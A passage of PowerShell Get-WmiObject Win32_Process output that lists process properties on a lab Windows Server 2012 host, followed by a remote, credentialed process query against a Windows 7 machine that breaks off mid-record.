868\nPeakPageFileUsage : 3172\nPeakVirtualSize : 232296448\nPeakWorkingSetSize : 7604\nPriority : 8\nPrivatePageCount : 2740224\nProcessId : 260\nQuotaNonPagedPoolUsage : 17\nQuotaPagedPoolUsage : 168\nQuotaPeakNonPagedPoolUsage : 21\nQuotaPeakPagedPoolUsage : 170\nReadOperationCount : 27\nReadTransferCount : 1724416\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 5\nUserModeTime : 156250\nVirtualSize : 230174720\nWindowsVersion : 6.3.9600\nWorkingSetSize : 7614464\nWriteOperationCount : 43\nWriteTransferCount : 835584\nPSComputerName : WIN-2012-DC\nProcessName : taskhostex.exe\nHandles : 195\nVM : 230174720\nWS : 7614464\nPath : C:\\Windows\\system32\\taskhostex.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"1188\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"1188\"\nCaption : explorer.exe\nCommandLine : C:\\Windows\\Explorer.EXE\nCreationClassName : Win32_Process\nCreationDate : 20170712145926.061690-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : explorer.exe\nExecutablePath : C:\\Windows\\Explorer.EXE\nExecutionState :\nHandle : 1188\nHandleCount : 1207\nInstallDate :\nKernelModeTime : 167343750\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : explorer.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 38649\nOtherTransferCount : 982340\nPageFaults : 151042\nPageFileUsage : 37648\nParentProcessId : 1860\nPeakPageFileUsage : 48264\nPeakVirtualSize : 588001280\nPeakWorkingSetSize : 91248\nPriority : 8\nPrivatePageCount : 38551552\nProcessId : 1188\nQuotaNonPagedPoolUsage : 67\nQuotaPagedPoolUsage : 1049\nQuotaPeakNonPagedPoolUsage : 95\nQuotaPeakPagedPoolUsage : 1189\nReadOperationCount : 3022\nReadTransferCount : 3067227\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 43\nUserModeTime : 78593750\nVirtualSize : 509153280\nWindowsVersion : 6.3.9600\nWorkingSetSize : 75325440\nWriteOperationCount : 151\nWriteTransferCount : 25552\nPSComputerName : WIN-2012-DC\nProcessName : explorer.exe\nHandles : 1207\nVM : 509153280\nWS : 75325440\nPath : C:\\Windows\\Explorer.EXE\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"3492\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"3492\"\nCaption : VBoxTray.exe\nCommandLine : \"C:\\Windows\\System32\\VBoxTray.exe\"\nCreationClassName : Win32_Process\nCreationDate : 20170712145937.014436-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : VBoxTray.exe\nExecutablePath : C:\\Windows\\System32\\VBoxTray.exe\nExecutionState :\nHandle : 3492\nHandleCount : 175\nInstallDate :\nKernelModeTime : 156250\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : VBoxTray.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 29914\nOtherTransferCount : 226456\nPageFaults : 11696\nPageFileUsage : 1792\nParentProcessId : 1188\nPeakPageFileUsage : 1888\nPeakVirtualSize : 89497600\nPeakWorkingSetSize : 6284\nPriority : 8\nPrivatePageCount : 1835008\nProcessId : 3492\nQuotaNonPagedPoolUsage : 12\nQuotaPagedPoolUsage : 152\nQuotaPeakNonPagedPoolUsage : 13\nQuotaPeakPagedPoolUsage : 153\nReadOperationCount : 4590\nReadTransferCount : 36720\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 10\nUserModeTime : 0\nVirtualSize : 85270528\nWindowsVersion : 6.3.9600\nWorkingSetSize : 6385664\nWriteOperationCount : 2295\nWriteTransferCount : 9180\nPSComputerName : WIN-2012-DC\nProcessName : VBoxTray.exe\nHandles : 175\nVM : 85270528\nWS : 6385664\nPath : C:\\Windows\\System32\\VBoxTray.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"3944\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"3944\"\nCaption : cmd.exe\nCommandLine : \"C:\\Windows\\system32\\cmd.exe\"\nCreationClassName : Win32_Process\nCreationDate : 20170712151804.014863-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : cmd.exe\nExecutablePath : C:\\Windows\\system32\\cmd.exe\nExecutionState :\nHandle : 3944\nHandleCount : 31\nInstallDate :\nKernelModeTime : 0\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : cmd.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 226\nOtherTransferCount : 3268\nPageFaults : 634\nPageFileUsage : 1516\nParentProcessId : 1188\nPeakPageFileUsage : 2612\nPeakVirtualSize : 13705216\nPeakWorkingSetSize : 2184\nPriority : 8\nPrivatePageCount : 1552384\nProcessId : 3944\nQuotaNonPagedPoolUsage : 3\nQuotaPagedPoolUsage : 24\nQuotaPeakNonPagedPoolUsage : 4\nQuotaPeakPagedPoolUsage : 25\nReadOperationCount : 0\nReadTransferCount : 0\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 1\nUserModeTime : 0\nVirtualSize : 12517376\nWindowsVersion : 6.3.9600\nWorkingSetSize : 2215936\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : WIN-2012-DC\nProcessName : cmd.exe\nHandles : 31\nVM : 12517376\nWS : 2215936\nPath : C:\\Windows\\system32\\cmd.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"3120\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"3120\"\nCaption : conhost.exe\nCommandLine : \\??\\C:\\Windows\\system32\\conhost.exe 0x4\nCreationClassName : Win32_Process\nCreationDate : 20170712151804.031029-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : conhost.exe\nExecutablePath : C:\\Windows\\system32\\conhost.exe\nExecutionState :\nHandle : 3120\nHandleCount : 57\nInstallDate :\nKernelModeTime : 312500\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : conhost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 275\nOtherTransferCount : 12923\nPageFaults : 1915\nPageFileUsage : 1012\nParentProcessId : 3944\nPeakPageFileUsage : 1128\nPeakVirtualSize : 62922752\nPeakWorkingSetSize : 6096\nPriority : 8\nPrivatePageCount : 1036288\nProcessId : 3120\nQuotaNonPagedPoolUsage : 7\nQuotaPagedPoolUsage : 107\nQuotaPeakNonPagedPoolUsage : 8\nQuotaPeakPagedPoolUsage : 125\nReadOperationCount : 11\nReadTransferCount : 452\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 2\nUserModeTime : 0\nVirtualSize : 53530624\nWindowsVersion : 6.3.9600\nWorkingSetSize : 5320704\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : WIN-2012-DC\nProcessName : conhost.exe\nHandles : 57\nVM : 53530624\nWS : 5320704\nPath : C:\\Windows\\system32\\conhost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"3832\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"3832\"\nCaption : python.exe\nCommandLine : python -m SimpleHTTPServer\nCreationClassName : Win32_Process\nCreationDate : 20170712151820.171032-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : python.exe\nExecutablePath : C:\\Python27\\python.exe\nExecutionState :\nHandle : 3832\nHandleCount : 162\nInstallDate :\nKernelModeTime : 468750\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : python.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 22459\nOtherTransferCount : 434276\nPageFaults : 2794\nPageFileUsage : 5664\nParentProcessId : 3944\nPeakPageFileUsage : 5816\nPeakVirtualSize : 88002560\nPeakWorkingSetSize : 10712\nPriority : 8\nPrivatePageCount : 5799936\nProcessId : 3832\nQuotaNonPagedPoolUsage : 11\nQuotaPagedPoolUsage : 146\nQuotaPeakNonPagedPoolUsage : 157\nQuotaPeakPagedPoolUsage : 146\nReadOperationCount : 240\nReadTransferCount : 1208439\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 1\nUserModeTime : 937500\nVirtualSize : 83390464\nWindowsVersion : 6.3.9600\nWorkingSetSize : 10915840\nWriteOperationCount : 44\nWriteTransferCount : 1051\nPSComputerName : WIN-2012-DC\nProcessName : python.exe\nHandles : 162\nVM : 83390464\nWS : 10915840\nPath : C:\\Python27\\python.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"3116\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"3116\"\nCaption : firefox.exe\nCommandLine : \"C:\\Program Files\\Mozilla Firefox\\firefox.exe\"\nCreationClassName : Win32_Process\nCreationDate : 20170712152444.358480-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : firefox.exe\nExecutablePath : C:\\Program Files\\Mozilla Firefox\\firefox.exe\nExecutionState :\nHandle : 3116\nHandleCount : 749\nInstallDate :\nKernelModeTime : 23750000\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : firefox.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 41297\nOtherTransferCount : 712762\nPageFaults : 1368464\nPageFileUsage : 144784\nParentProcessId : 1188\nPeakPageFileUsage : 180008\nPeakVirtualSize : 1768960000\nPeakWorkingSetSize : 221460\nPriority : 8\nPrivatePageCount : 148258816\nProcessId : 3116\nQuotaNonPagedPoolUsage : 62\nQuotaPagedPoolUsage : 607\nQuotaPeakNonPagedPoolUsage : 87\nQuotaPeakPagedPoolUsage : 731\nReadOperationCount : 5632\nReadTransferCount : 373181628\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 42\nUserModeTime : 124531250\nVirtualSize : 1683611648\nWindowsVersion : 6.3.9600\nWorkingSetSize : 200855552\nWriteOperationCount : 632356\nWriteTransferCount : 143084163\nPSComputerName : WIN-2012-DC\nProcessName : firefox.exe\nHandles : 749\nVM : 1683611648\nWS : 200855552\nPath : C:\\Program Files\\Mozilla Firefox\\firefox.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"2992\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"2992\"\nCaption : firefox.exe\nCommandLine : \"C:\\Program Files\\Mozilla Firefox\\firefox.exe\" -contentproc --channel=\"3116.0.1418504536\\2120526436\" -childID 1 -isForBrowser -intPrefs 5:50|6:-1|28:1000|33:20|34:10|43:128|\n 44:10000|48:0|50:400|51:1|52:0|53:0|58:0|59:120|60:120|133:2|134:1|147:5000|157:0|159:0|170:10000|182:-1|187:128|188:10000|189:0|195:24|196:32768|198:0|199:0|207:5|211:10485\n 76|212:100|213:5000|215:600|217:1|226:1|231:0|241:60000| -boolPrefs 1:0|2:0|4:0|26:1|27:1|30:0|35:1|36:0|37:0|38:0|39:1|40:0|41:1|42:1|45:0|46:0|47:0|49:0|54:1|55:1|56:0|57:\n 1|61:1|62:1|63:0|64:1|65:1|66:0|67:1|70:0|71:0|74:1|75:1|79:1|80:1|81:0|82:0|84:0|85:0|86:1|87:0|90:0|91:1|92:1|93:1|94:1|95:1|96:0|97:0|98:1|99:0|100:0|101:0|102:1|103:1|10\n 4:0|105:1|106:1|107:0|108:0|109:1|110:1|111:1|112:0|113:1|114:1|115:1|116:1|117:1|118:1|119:1|120:1|122:0|123:0|124:0|125:1|126:0|127:1|131:1|132:1|135:1|136:0|141:0|146:0|1\n 49:1|152:1|154:1|158:0|161:1|164:1|165:1|171:0|172:0|173:1|175:0|181:0|183:1|184:0|185:0|186:0|193:0|194:0|197:1|200:0|202:0|204:1|205:0|210:0|214:1|219:0|220:0|221:0|222:1|\n 224:1|225:1|228:0|233:0|234:0|235:1|236:1|237:0|238:1|239:1|240:0|242:0|243:0|245:0|253:1|254:1|255:0|256:0|257:0| -stringPrefs \"3:7;release|174:3;1.0|191:332; ¼½¾!???:?????\n %???????? ???????-’·?????????‹›?/???????????????/:?????????????????? ???????????????????./???????|192:8;moderate|227:38;{d130b7e4-5618-427c-891a-ee8a0888c2a8}|\"\n -greomni \"C:\\Program Files\\Mozilla Firefox\\omni.ja\" -appomni \"C:\\Program Files\\Mozilla Firefox\\browser\\omni.ja\" -appdir \"C:\\Program Files\\Mozilla Firefox\\browser\" 3116\n \"\\\\.\\pipe\\gecko-crash-server-pipe.3116\" tab\nCreationClassName : Win32_Process\nCreationDate : 20170712152446.155540-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : firefox.exe\nExecutablePath : C:\\Program Files\\Mozilla Firefox\\firefox.exe\nExecutionState :\nHandle : 2992\nHandleCount : 286\nInstallDate :\nKernelModeTime : 2812500\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : firefox.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 976\nOtherTransferCount : 12866\nPageFaults : 37633\nPageFileUsage : 34096\nParentProcessId : 3116\nPeakPageFileUsage : 44108\nPeakVirtualSize : 1400070144\nPeakWorkingSetSize : 82424\nPriority : 8\nPrivatePageCount : 34914304\nProcessId : 2992\nQuotaNonPagedPoolUsage : 30\nQuotaPagedPoolUsage : 454\nQuotaPeakNonPagedPoolUsage : 32\nQuotaPeakPagedPoolUsage : 474\nReadOperationCount : 3966\nReadTransferCount : 70438261\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 17\nUserModeTime : 6875000\nVirtualSize : 1378304000\nWindowsVersion : 6.3.9600\nWorkingSetSize : 72314880\nWriteOperationCount : 2307\nWriteTransferCount : 487820\nPSComputerName : WIN-2012-DC\nProcessName : firefox.exe\nHandles : 286\nVM : 1378304000\nWS : 72314880\nPath : C:\\Program Files\\Mozilla Firefox\\firefox.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"956\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"956\"\nCaption : notepad.exe\nCommandLine : \"C:\\Windows\\system32\\NOTEPAD.EXE\" C:\\Users\\Administrator\\Desktop\\log.txt\nCreationClassName : Win32_Process\nCreationDate : 20170712153213.828260-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : notepad.exe\nExecutablePath : C:\\Windows\\system32\\NOTEPAD.EXE\nExecutionState :\nHandle : 956\nHandleCount : 95\nInstallDate :\nKernelModeTime : 937500\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : notepad.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 207\nOtherTransferCount : 1744\nPageFaults : 4672\nPageFileUsage : 3024\nParentProcessId : 1188\nPeakPageFileUsage : 4012\nPeakVirtualSize : 151597056\nPeakWorkingSetSize : 10756\nPriority : 8\nPrivatePageCount : 3096576\nProcessId : 956\nQuotaNonPagedPoolUsage : 9\nQuotaPagedPoolUsage : 278\nQuotaPeakNonPagedPoolUsage : 10\nQuotaPeakPagedPoolUsage : 289\nReadOperationCount : 1\nReadTransferCount : 60\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 1\nUserModeTime : 625000\nVirtualSize : 148074496\nWindowsVersion : 6.3.9600\nWorkingSetSize : 10457088\nWriteOperationCount : 10\nWriteTransferCount : 672390\nPSComputerName : WIN-2012-DC\nProcessName : notepad.exe\nHandles : 95\nVM : 148074496\nWS : 10457088\nPath : C:\\Windows\\system32\\NOTEPAD.EXE\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"3416\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"3416\"\nCaption : powershell.exe\nCommandLine : \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"\nCreationClassName : Win32_Process\nCreationDate : 20170712164403.172486-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : powershell.exe\nExecutablePath : C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\nExecutionState :\nHandle : 3416\nHandleCount : 448\nInstallDate :\nKernelModeTime : 23281250\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : powershell.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 99601\nOtherTransferCount : 6543278\nPageFaults : 298573\nPageFileUsage : 112212\nParentProcessId : 1188\nPeakPageFileUsage : 114860\nPeakVirtualSize : 659030016\nPeakWorkingSetSize : 122112\nPriority : 8\nPrivatePageCount : 114905088\nProcessId : 3416\nQuotaNonPagedPoolUsage : 35\nQuotaPagedPoolUsage : 431\nQuotaPeakNonPagedPoolUsage : 40\nQuotaPeakPagedPoolUsage : 436\nReadOperationCount : 1024\nReadTransferCount : 3479940\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 10\nUserModeTime : 164531250\nVirtualSize : 657010688\nWindowsVersion : 6.3.9600\nWorkingSetSize : 122355712\nWriteOperationCount : 3\nWriteTransferCount : 5430\nPSComputerName : WIN-2012-DC\nProcessName : powershell.exe\nHandles : 448\nVM : 657010688\nWS : 122355712\nPath : C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"1928\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"1928\"\nCaption : conhost.exe\nCommandLine : \\??\\C:\\Windows\\system32\\conhost.exe 0x4\nCreationClassName : Win32_Process\nCreationDate : 20170712164403.172486-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : conhost.exe\nExecutablePath : C:\\Windows\\system32\\conhost.exe\nExecutionState :\nHandle : 1928\nHandleCount : 58\nInstallDate :\nKernelModeTime : 42812500\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : conhost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 71097\nOtherTransferCount : 4783207\nPageFaults : 5369\nPageFileUsage : 7316\nParentProcessId : 3416\nPeakPageFileUsage : 11276\nPeakVirtualSize : 88776704\nPeakWorkingSetSize : 18428\nPriority : 8\nPrivatePageCount : 7491584\nProcessId : 1928\nQuotaNonPagedPoolUsage : 7\nQuotaPagedPoolUsage : 142\nQuotaPeakNonPagedPoolUsage : 8\nQuotaPeakPagedPoolUsage : 161\nReadOperationCount : 24\nReadTransferCount : 816\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 2\nUserModeTime : 2812500\nVirtualSize : 78757888\nWindowsVersion : 6.3.9600\nWorkingSetSize : 16302080\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : WIN-2012-DC\nProcessName : conhost.exe\nHandles : 58\nVM : 78757888\nWS : 16302080\nPath : C:\\Windows\\system32\\conhost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"840\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"840\"\nCaption : WmiPrvSE.exe\nCommandLine : C:\\Windows\\system32\\wbem\\wmiprvse.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712165108.172589-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : WmiPrvSE.exe\nExecutablePath : C:\\Windows\\system32\\wbem\\wmiprvse.exe\nExecutionState :\nHandle : 840\nHandleCount : 129\nInstallDate :\nKernelModeTime : 312500\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : WmiPrvSE.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 1184\nOtherTransferCount : 244\nPageFaults : 4433\nPageFileUsage : 2152\nParentProcessId : 572\nPeakPageFileUsage : 2624\nPeakVirtualSize : 35962880\nPeakWorkingSetSize : 5924\nPriority : 8\nPrivatePageCount : 2203648\nProcessId : 840\nQuotaNonPagedPoolUsage : 9\nQuotaPagedPoolUsage : 62\nQuotaPeakNonPagedPoolUsage : 11\nQuotaPeakPagedPoolUsage : 64\nReadOperationCount : 0\nReadTransferCount : 0\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 7\nUserModeTime : 156250\nVirtualSize : 34516992\nWindowsVersion : 6.3.9600\nWorkingSetSize : 5709824\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : WIN-2012-DC\nProcessName : WmiPrvSE.exe\nHandles : 129\nVM : 34516992\nWS : 5709824\nPath : C:\\Windows\\system32\\wbem\\wmiprvse.exe\n\nPS C:\\Users\\Administrator>\n```\n\n- Using ```Get-WmiObject``` - ```Remote```\n\n```\nPS C:\\Users\\Administrator> Get-WmiObject -Class Win32_Process -ComputerName JOHN-PC -Credential John-PC\\John\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"0\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"0\"\nCaption : System Idle Process\nCommandLine :\nCreationClassName : Win32_Process\nCreationDate :\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : System Idle Process\nExecutablePath :\nExecutionState :\nHandle : 0\nHandleCount : 0\nInstallDate :\nKernelModeTime : 203835200624\nMaximumWorkingSetSize :\nMinimumWorkingSetSize :\nName : System Idle Process\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 0\nOtherTransferCount : 0\nPageFaults : 0\nPageFileUsage : 0\nParentProcessId : 0\nPeakPageFileUsage : 0\nPeakVirtualSize : 0\nPeakWorkingSetSize : 0\nPriority : 0\nPrivatePageCount : 0\nProcessId : 0\nQuotaNonPagedPoolUsage : 0\nQuotaPagedPoolUsage : 0\nQuotaPeakNonPagedPoolUsage : 0\nQuotaPeakPagedPoolUsage : 0\nReadOperationCount : 0\nReadTransferCount : 0\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 1\nUserModeTime : 0\nVirtualSize : 0\nWindowsVersion : 6.1.7600\nWorkingSetSize : 12288\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : JOHN-PC\nProcessName : System Idle Process\nHandles : 0\nVM : 0\nWS : 12288\nPath :\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"4\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"4\"\nCaption : System\nCommandLine :\nCreationClassName : Win32_Process\nCreationDate : 20170712122327.686019-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : System\nExecutablePath :\nExecutionState :\nHandle : 4\nHandleCount : 566\nInstallDate :\nKernelModeTime : 96638960\nMaximumWorkingSetSize :\nMinimumWorkingSetSize :\nName : System\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 7608\nOtherTransferCount : 617853\nPageFaults : 10151\nPageFileUsage : 44\nParentProcessId : 0\nPeakPageFileUsage : 180\nPeakVirtualSize : 6365184\nPeakWorkingSetSize : 4840\nPriority : 8\nPrivatePageCount : 45056\nProcessId : 4\nQuotaNonPagedPoolUsage : 0\nQuotaPagedPoolUsage : 0\nQuotaPeakNonPagedPoolUsage : 0\nQuotaPeakPagedPoolUsage : 0\nReadOperationCount : 1468\nReadTransferCount : 26788136\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 85\nUserModeTime : 0\nVirtualSize : 1966080\nWindowsVersion : 6.1.7600\nWorkingSetSize : 606208\nWriteOperationCount : 6499\nWriteTransferCount : 59286136\nPSComputerName : JOHN-PC\nProcessName : System\nHandles : 566\nVM : 1966080\nWS : 606208\nPath :\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"272\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"272\"\nCaption : smss.exe\nCommandLine : \\SystemRoot\\System32\\smss.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712122327.696033-420\nCSCreationClassName : 